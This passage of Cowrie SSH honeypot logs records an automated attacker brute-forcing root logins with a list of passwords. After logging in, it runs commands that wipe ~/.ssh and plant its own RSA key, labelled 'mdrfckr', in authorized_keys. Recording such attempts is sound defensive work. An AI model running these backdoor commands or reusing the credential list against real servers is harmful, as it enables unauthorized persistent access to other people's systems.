03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:21.242190Z","src_ip":"212.227.235.229","session":"e5c02e39b867"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:42:21.571515Z","src_ip":"212.227.235.229","session":"e5c02e39b867"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:21.644587Z","src_ip":"212.227.235.229","session":"6e29597cdd25"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:21.645707Z","src_ip":"212.227.235.229","session":"e5c02e39b867"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59658,"dst_ip":"1.2.3.4","dst_port":22,"session":"f67dfbe1da9b","protocol":"ssh","message":"New connection: 212.227.235.229:59658 (1.2.3.4:22) [session: f67dfbe1da9b]","sensor":"my-vps","timestamp":"2025-08-26T04:42:30.256197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:30.257251Z","src_ip":"212.227.235.229","session":"f67dfbe1da9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:30.533606Z","src_ip":"212.227.235.229","session":"f67dfbe1da9b"}
{"eventid":"cowrie.login.failed","username":"test","password":"12344321","message":"login attempt [test/12344321] failed","sensor":"my-vps","timestamp":"2025-08-26T04:42:31.679106Z","src_ip":"212.227.235.229","session":"f67dfbe1da9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51814,"dst_ip":"1.2.3.4","dst_port":22,"session":"85171b3677cc","protocol":"ssh","message":"New connection: 212.227.235.229:51814 (1.2.3.4:22) [session: 85171b3677cc]","sensor":"my-vps","timestamp":"2025-08-26T04:42:32.337003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:32.338561Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:32.585977Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:32.957026Z","src_ip":"212.227.235.229","session":"f67dfbe1da9b"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx#EDC","message":"login attempt [root/!QAZ2wsx#EDC] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:42:33.616377Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:42:34.195486Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:42:34.196282Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:42:34.197526Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:34.446606Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:42:34.958834Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:42:34.959517Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:42:35.209138Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:35.210190Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51830,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ff433a56ad6","protocol":"ssh","message":"New connection: 212.227.235.229:51830 (1.2.3.4:22) [session: 1ff433a56ad6]","sensor":"my-vps","timestamp":"2025-08-26T04:42:35.464030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:35.464826Z","src_ip":"212.227.235.229","session":"1ff433a56ad6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:35.716984Z","src_ip":"212.227.235.229","session":"1ff433a56ad6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:42:36.767284Z","src_ip":"212.227.235.229","session":"1ff433a56ad6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:38.021351Z","src_ip":"212.227.235.229","session":"1ff433a56ad6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45016,"dst_ip":"1.2.3.4","dst_port":22,"session":"83bb156c2809","protocol":"ssh","message":"New connection: 212.227.235.229:45016 (1.2.3.4:22) [session: 83bb156c2809]","sensor":"my-vps","timestamp":"2025-08-26T04:42:38.266839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:42:38.267598Z","src_ip":"212.227.235.229","session":"83bb156c2809"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:42:38.514742Z","src_ip":"212.227.235.229","session":"83bb156c2809"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:42:39.543444Z","src_ip":"212.227.235.229","session":"83bb156c2809"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:39.789022Z","src_ip":"212.227.235.229","session":"85171b3677cc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:42:39.791893Z","src_ip":"212.227.235.229","session":"83bb156c2809"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37160,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec1083d91bee","protocol":"ssh","message":"New connection: 212.227.235.229:37160 (1.2.3.4:22) [session: ec1083d91bee]","sensor":"my-vps","timestamp":"2025-08-26T04:43:14.154231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:43:14.156041Z","src_ip":"212.227.235.229","session":"ec1083d91bee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:43:14.230724Z","src_ip":"212.227.235.229","session":"ec1083d91bee"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev2023","message":"login attempt [dev/dev2023] failed","sensor":"my-vps","timestamp":"2025-08-26T04:43:14.531828Z","src_ip":"212.227.235.229","session":"ec1083d91bee"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:15.610805Z","src_ip":"212.227.235.229","session":"ec1083d91bee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:19.460253Z","src_ip":"176.65.149.186","session":"60457b97365b"}
{"eventid":"cowrie.session.closed","duration":180.0674169063568,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:19.464577Z","src_ip":"176.65.149.186","session":"60457b97365b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48656,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fb048fc4f53","protocol":"ssh","message":"New connection: 212.227.235.229:48656 (1.2.3.4:22) [session: 2fb048fc4f53]","sensor":"my-vps","timestamp":"2025-08-26T04:43:22.158070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:43:22.159376Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:43:22.428025Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.login.success","username":"root","password":"Wb123456","message":"login attempt [root/Wb123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:43:23.544922Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:43:24.149679Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:43:24.150417Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:43:24.151315Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:24.421699Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:43:24.985813Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:43:24.986772Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:43:25.258990Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:43:25.260090Z","src_ip":"212.227.235.229","session":"2fb048fc4f53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42490,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a1fda9e3652","protocol":"ssh","message":"New connection: 212.227.235.229:42490 (1.2.3.4:22) [session: 3a1fda9e3652]","sensor":"my-vps","timestamp":"2025-08-26T04:43:25.526686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:43:25.527560Z","src_ip":"212.227.235.229","session":"3a1fda9e3652"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 